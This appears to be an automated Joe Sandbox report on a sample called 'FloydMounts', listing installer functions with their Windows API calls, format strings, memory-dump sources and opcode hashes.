                                                                                              • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                              • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                              • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                              Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                              • MulDiv.KERNEL32(00064E00,00000064,00153BD4), ref: 00403295
                                                                                              • wsprintfW.USER32 ref: 004032A5
                                                                                              • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 0040329F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                              • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                              • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                              • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                              Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                              • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                              • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: *?|<>/":
                                                                                              • API String ID: 589700163-165019052
                                                                                              • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                              • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                              • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                              • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                              Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                              • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                              • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                              • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                              Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                              • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                              • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              • GlobalFree.KERNEL32(00716D68), ref: 00402387
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3376005127-0
                                                                                              • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                              • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                              • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                              • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                              Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                              • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                              • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2568930968-0
                                                                                              • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                              • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                              • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                              • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                              Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?), ref: 004020A3
                                                                                              • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                              • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                              • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                              • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                              • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                              Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                              • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                              • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                              • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                              Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                              • wsprintfW.USER32 ref: 00404483
                                                                                              • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s
                                                                                              • API String ID: 3540041739-3551169577
                                                                                              • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                              • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                              • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                              • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                              Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                              • API String ID: 1697273262-1764544995
                                                                                              • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                              • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                              • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                              • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                              Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                              • lstrlenW.KERNEL32 ref: 004026B4
                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                              • String ID: CopyFiles "%s"->"%s"
                                                                                              • API String ID: 2577523808-3778932970
                                                                                              • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                              • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                              • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                              • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                              Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcatwsprintf
                                                                                              • String ID: %02x%c$...
                                                                                              • API String ID: 3065427908-1057055748
                                                                                              • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                              • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                              • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                              • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                              Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                              • String ID: Section: "%s"$Skipping section: "%s"
                                                                                              • API String ID: 2266616436-4211696005
                                                                                              • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                              • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                              • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                              • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                              Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00402100
